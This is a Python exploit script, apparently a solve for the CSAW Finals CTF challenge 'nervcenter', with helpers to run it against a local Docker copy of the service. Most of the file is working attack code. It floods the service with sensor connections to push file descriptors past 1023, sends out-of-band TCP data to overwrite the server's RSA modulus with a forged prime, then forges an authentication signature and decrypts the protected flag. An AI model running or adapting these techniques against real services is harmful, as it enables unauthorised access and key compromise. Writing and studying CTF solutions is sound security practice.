|
#!/usr/bin/env python3 |
|
|
|
import argparse |
|
import base64 |
|
import hashlib |
|
import os |
|
import random |
|
import re |
|
import resource |
|
import socket |
|
import subprocess |
|
import sys |
|
import time |
|
from pathlib import Path |
|
|
|
from cryptography.hazmat.primitives.ciphers.aead import AESGCM |
|
|
|
|
|
REPO_DIR = Path(__file__).resolve().parent |
|
CONTAINER_NAME = "nervcenter-real-solve" |
|
CONTROL_PORT = 2000 |
|
PORT_RANGE = "2000-2100" |
|
RSA_E = 65537 |
|
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420") |
|
|
|
|
|
def run(cmd: list[str], check: bool = True) -> subprocess.CompletedProcess[str]: |
|
return subprocess.run(cmd, check=check, text=True, capture_output=True) |
|
|
|
|
|
def docker(*args: str, check: bool = True) -> subprocess.CompletedProcess[str]: |
|
return run(["docker", *args], check=check) |
|
|
|
|
|
def shell_quote(s: str) -> str: |
|
return "'" + s.replace("'", "'\"'\"'") + "'" |
|
|
|
|
|
def container_running(name: str) -> bool: |
|
result = docker("ps", "-q", "-f", f"name=^{name}$", check=False) |
|
return bool(result.stdout.strip()) |
|
|
|
|
|
def remove_container(name: str) -> None: |
|
docker("rm", "-f", name, check=False) |
|
|
|
|
|
def start_container(name: str, flag_value: str) -> None: |
|
remove_container(name) |
|
cmd = [ |
|
"run", |
|
"-d", |
|
"--name", |
|
name, |
|
"--platform", |
|
"linux/amd64", |
|
"-p", |
|
f"{PORT_RANGE}:{PORT_RANGE}", |
|
"-v", |
|
f"{REPO_DIR}:/ro:ro", |
|
"ubuntu:24.04", |
|
"bash", |
|
"-lc", |
|
( |
|
"apt-get update >/dev/null && " |
|
"apt-get install -y libssl3 zlib1g python3 python3-cryptography >/dev/null && " |
|
"cp /ro/nervcenter /tmp/nervcenter && " |
|
"chmod +x /tmp/nervcenter && " |
|
f"printf '%s\\n' {shell_quote(flag_value)} > /tmp/flag.txt && " |
|
"cd /tmp && exec ./nervcenter" |
|
), |
|
] |
|
run(["docker", *cmd]) |
|
|
|
|
|
def wait_for_port(host: str, port: int, timeout: float = 30.0) -> None: |
|
deadline = time.time() + timeout |
|
last_error: OSError | None = None |
|
while time.time() < deadline: |
|
try: |
|
with socket.create_connection((host, port), timeout=1.0): |
|
return |
|
except OSError as exc: |
|
last_error = exc |
|
time.sleep(0.25) |
|
raise RuntimeError(f"timed out waiting for {host}:{port}: {last_error}") |
|
|
|
|
|
def wait_for_container_ready(name: str, timeout: float = 120.0) -> None: |
|
deadline = time.time() + timeout |
|
while time.time() < deadline: |
|
result = run( |
|
[ |
|
"docker", |
|
"exec", |
|
name, |
|
"bash", |
|
"-lc", |
|
"python3 - <<'PY'\n" |
|
"import importlib.util, subprocess, sys\n" |
|
"ok = importlib.util.find_spec('cryptography') is not None\n" |
|
"running = subprocess.run(\n" |
|
" \"ps -ef | grep -q '[.]\\\\/nervcenter'\",\n" |
|
" shell=True,\n" |
|
" check=False,\n" |
|
").returncode == 0\n" |
|
"sys.exit(0 if ok and running else 1)\n" |
|
"PY", |
|
], |
|
check=False, |
|
) |
|
if result.returncode == 0: |
|
return |
|
time.sleep(1.0) |
|
raise RuntimeError(f"timed out waiting for container {name} to finish startup") |
|
|
|
|
|
def recv_until(sock: socket.socket, marker: bytes, timeout: float = 10.0) -> bytes: |
|
sock.settimeout(timeout) |
|
data = bytearray() |
|
while marker not in data: |
|
chunk = sock.recv(4096) |
|
if not chunk: |
|
raise RuntimeError(f"connection closed before marker {marker!r}") |
|
data.extend(chunk) |
|
return bytes(data) |
|
|
|
|
|
def parse_sensor_port(banner: bytes) -> int: |
|
match = re.search(rb"Session sensor port is: (\d+)", banner) |
|
if not match: |
|
raise RuntimeError("could not parse sensor port") |
|
return int(match.group(1)) |
|
|
|
|
|
def parse_public_key(blob: bytes) -> tuple[int, bytes]: |
|
match = re.search(rb"Your public key is:\nssh-rsa ([A-Za-z0-9+/=]+) ", blob) |
|
if not match: |
|
raise RuntimeError("could not parse SSH public key") |
|
data = base64.b64decode(match.group(1)) |
|
offset = 0 |
|
|
|
def take() -> bytes: |
|
nonlocal offset |
|
n = int.from_bytes(data[offset : offset + 4], "big") |
|
offset += 4 |
|
out = data[offset : offset + n] |
|
offset += n |
|
return out |
|
|
|
key_type = take() |
|
if key_type != b"ssh-rsa": |
|
raise RuntimeError(f"unexpected key type: {key_type!r}") |
|
exponent = int.from_bytes(take(), "big") |
|
modulus = take() |
|
if len(modulus) == 129 and modulus[0] == 0: |
|
modulus = modulus[1:] |
|
if len(modulus) != 128: |
|
raise RuntimeError(f"unexpected modulus length: {len(modulus)}") |
|
return exponent, modulus |
|
|
|
|
|
def parse_challenge(blob: bytes) -> bytes: |
|
match = re.search(rb"Challenge: ([0-9a-fA-F]+)", blob) |
|
if not match: |
|
raise RuntimeError("could not parse authentication challenge") |
|
return bytes.fromhex(match.group(1).decode()) |
|
|
|
|
|
def parse_encrypted_message(blob: bytes) -> bytes: |
|
match = re.search( |
|
rb"-----BEGIN NERV ENCRYPTED MESSAGE-----\s*(.*?)\s*-----END NERV ENCRYPTED MESSAGE-----", |
|
blob, |
|
flags=re.DOTALL, |
|
) |
|
if not match: |
|
raise RuntimeError("could not parse encrypted message") |
|
return base64.b64decode(b"".join(match.group(1).split())) |
|
|
|
|
|
def try_raise_nofile(limit: int = 4096) -> None: |
|
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE) |
|
target = min(limit, hard) |
|
if soft < target: |
|
resource.setrlimit(resource.RLIMIT_NOFILE, (target, hard)) |
|
|
|
|
|
def is_probable_prime(n: int, rounds: int = 24) -> bool: |
|
if n < 2: |
|
return False |
|
small_primes = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37) |
|
for p in small_primes: |
|
if n % p == 0: |
|
return n == p |
|
d = n - 1 |
|
s = 0 |
|
while d % 2 == 0: |
|
s += 1 |
|
d //= 2 |
|
for _ in range(rounds): |
|
a = random.randrange(2, n - 2) |
|
x = pow(a, d, n) |
|
if x == 1 or x == n - 1: |
|
continue |
|
for _ in range(s - 1): |
|
x = pow(x, 2, n) |
|
if x == n - 1: |
|
break |
|
else: |
|
return False |
|
return True |
|
|
|
|
|
def find_prime_prefix(suffix: bytes) -> bytes: |
|
tries = 0 |
|
while True: |
|
tries += 1 |
|
prefix = os.urandom(8) |
|
if prefix[0] == 0: |
|
continue |
|
candidate = int.from_bytes(prefix + suffix, "big") |
|
if candidate % 2 == 0: |
|
continue |
|
if (candidate - 1) % RSA_E == 0: |
|
continue |
|
if is_probable_prime(candidate): |
|
return prefix |
|
|
|
|
|
def emsa_pkcs1_v1_5_sha256(digest: bytes, k: int) -> bytes: |
|
t = SHA256_DIGESTINFO + digest |
|
ps = b"\xff" * (k - len(t) - 3) |
|
return b"\x00\x01" + ps + b"\x00" + t |
|
|
|
|
|
def sign_challenge(challenge: bytes, modulus: int, private_exponent: int, k: int = 128) -> bytes: |
|
encoded = emsa_pkcs1_v1_5_sha256(challenge, k) |
|
sig = pow(int.from_bytes(encoded, "big"), private_exponent, modulus) |
|
return sig.to_bytes(k, "big") |
|
|
|
|
|
def mgf1(seed: bytes, length: int) -> bytes: |
|
out = bytearray() |
|
counter = 0 |
|
while len(out) < length: |
|
out.extend(hashlib.sha1(seed + counter.to_bytes(4, "big")).digest()) |
|
counter += 1 |
|
return bytes(out[:length]) |
|
|
|
|
|
def oaep_unpad(block: bytes) -> bytes: |
|
hlen = hashlib.sha1().digest_size |
|
y = block[0] |
|
masked_seed = block[1 : 1 + hlen] |
|
masked_db = block[1 + hlen :] |
|
seed_mask = mgf1(masked_db, hlen) |
|
seed = bytes(a ^ b for a, b in zip(masked_seed, seed_mask)) |
|
db_mask = mgf1(seed, len(masked_db)) |
|
db = bytes(a ^ b for a, b in zip(masked_db, db_mask)) |
|
lhash = hashlib.sha1(b"").digest() |
|
if y != 0 or db[:hlen] != lhash: |
|
raise RuntimeError("OAEP padding check failed") |
|
rest = db[hlen:] |
|
idx = rest.find(b"\x01") |
|
if idx == -1 or any(rest[:idx]): |
|
raise RuntimeError("OAEP separator not found") |
|
return rest[idx + 1 :] |
|
|
|
|
|
def decrypt_flag(blob: bytes, modulus: int, private_exponent: int) -> bytes: |
|
if len(blob) < 8 + 16 + 12: |
|
raise RuntimeError("encrypted blob too short") |
|
ciphertext_len = int.from_bytes(blob[:8], "little") |
|
start = 8 |
|
end = start + ciphertext_len |
|
ciphertext = blob[start:end] |
|
tag = blob[end : end + 16] |
|
iv = blob[end + 16 : end + 28] |
|
enc_key = blob[end + 28 :] |
|
decrypted = pow(int.from_bytes(enc_key, "big"), private_exponent, modulus) |
|
padded_key = decrypted.to_bytes(len(enc_key), "big") |
|
aes_key = oaep_unpad(padded_key) |
|
return AESGCM(aes_key).decrypt(iv, ciphertext + tag, None) |
|
|
|
|
|
def open_sensor_farm(host: str, sensor_port: int) -> dict[int, socket.socket]: |
|
sensors: dict[int, socket.socket] = {} |
|
for _ in range(1100): |
|
sensor = socket.create_connection((host, sensor_port), timeout=5.0) |
|
banner = recv_until(sensor, b"> ") |
|
match = re.search(rb"This is sensor ID (\d+)\.", banner) |
|
if not match: |
|
raise RuntimeError("could not parse sensor ID") |
|
fd = int(match.group(1)) |
|
sensors[fd] = sensor |
|
if fd >= 1087: |
|
break |
|
if 1087 not in sensors: |
|
raise RuntimeError("failed to force sensor fds above 1023") |
|
return sensors |
|
|
|
|
|
def exploit(host: str, port: int) -> str: |
|
try_raise_nofile() |
|
with socket.create_connection((host, port), timeout=5.0) as control: |
|
banner = recv_until(control, b"Enter your choice: ") |
|
sensor_port = parse_sensor_port(banner) |
|
|
|
control.sendall(b"2\n") |
|
pubkey = recv_until(control, b"Enter your choice: ") |
|
exponent, original_modulus = parse_public_key(pubkey) |
|
if exponent != RSA_E: |
|
raise RuntimeError(f"unexpected public exponent: {exponent}") |
|
|
|
prefix = find_prime_prefix(original_modulus[8:]) |
|
forged_modulus_bytes = prefix + original_modulus[8:] |
|
forged_modulus = int.from_bytes(forged_modulus_bytes, "big") |
|
private_exponent = pow(RSA_E, -1, forged_modulus - 1) |
|
sensors = open_sensor_farm(host, sensor_port) |
|
try: |
|
keep: dict[int, socket.socket] = {} |
|
mask = int.from_bytes(prefix, "little") |
|
for bit in range(64): |
|
fd = 1024 + bit |
|
if (mask >> bit) & 1: |
|
sensors[fd].send(bytes([65 + (bit % 26)]), socket.MSG_OOB) |
|
keep[fd] = sensors[fd] |
|
|
|
time.sleep(0.2) |
|
|
|
for fd, sensor in list(sensors.items()): |
|
if fd not in keep: |
|
sensor.close() |
|
del sensors[fd] |
|
|
|
time.sleep(1.0) |
|
control.sendall(b"2\n") |
|
pubkey_after = recv_until(control, b"Enter your choice: ") |
|
_, modified_modulus = parse_public_key(pubkey_after) |
|
if modified_modulus != forged_modulus_bytes: |
|
raise RuntimeError( |
|
"failed to rewrite modulus as expected; this path requires working TCP urgent data" |
|
) |
|
|
|
control.sendall(b"1\n") |
|
auth_prompt = recv_until(control, b"Response: ") |
|
challenge = parse_challenge(auth_prompt) |
|
signature = sign_challenge(challenge, forged_modulus, private_exponent) |
|
control.sendall(signature.hex().encode() + b"\n") |
|
auth_result = recv_until(control, b"Enter your choice: ") |
|
if b"Authentication successful!" not in auth_result: |
|
raise RuntimeError("authentication failed") |
|
|
|
control.sendall(b"1\n") |
|
encrypted = recv_until(control, b"-----END NERV ENCRYPTED MESSAGE-----") |
|
blob = parse_encrypted_message(encrypted) |
|
return decrypt_flag(blob, forged_modulus, private_exponent).decode( |
|
"utf-8", "replace" |
|
).strip() |
|
finally: |
|
for sensor in sensors.values(): |
|
try: |
|
sensor.close() |
|
except OSError: |
|
pass |
|
|
|
|
|
def run_inside_container(name: str) -> int: |
|
cmd = [ |
|
"exec", |
|
name, |
|
"/usr/bin/python3", |
|
"/ro/solve.py", |
|
"--host", |
|
"127.0.0.1", |
|
"--port", |
|
str(CONTROL_PORT), |
|
"--network-only", |
|
] |
|
result = run(["docker", *cmd], check=False) |
|
sys.stdout.write(result.stdout) |
|
sys.stderr.write(result.stderr) |
|
return result.returncode |
|
|
|
|
|
def main() -> int: |
|
parser = argparse.ArgumentParser(description="Exploit for the CSAW Finals challenge nervcenter") |
|
parser.add_argument("--host", default="127.0.0.1") |
|
parser.add_argument("--port", type=int, default=CONTROL_PORT) |
|
parser.add_argument( |
|
"--local-docker", |
|
action="store_true", |
|
help="start a local amd64 Docker container and run the exploit from inside it", |
|
) |
|
parser.add_argument( |
|
"--network-only", |
|
action="store_true", |
|
help="run the network exploit directly without Docker helpers", |
|
) |
|
parser.add_argument("--container-name", default=CONTAINER_NAME) |
|
parser.add_argument( |
|
"--flag", |
|
default="DUMMYFLAG{test_flag}", |
|
help="dummy flag value for --local-docker verification", |
|
) |
|
parser.add_argument( |
|
"--reuse-container", |
|
action="store_true", |
|
help="reuse an existing --local-docker container", |
|
) |
|
global args |
|
args = parser.parse_args() |
|
|
|
if args.local_docker and not args.network_only: |
|
if not args.reuse_container or not container_running(args.container_name): |
|
start_container(args.container_name, args.flag) |
|
wait_for_port("127.0.0.1", CONTROL_PORT) |
|
wait_for_container_ready(args.container_name) |
|
return run_inside_container(args.container_name) |
|
|
|
flag = exploit(args.host, args.port) |
|
print(f"[+] recovered flag: {flag}") |
|
return 0 |
|
|
|
|
|
if __name__ == "__main__": |
|
sys.exit(main()) |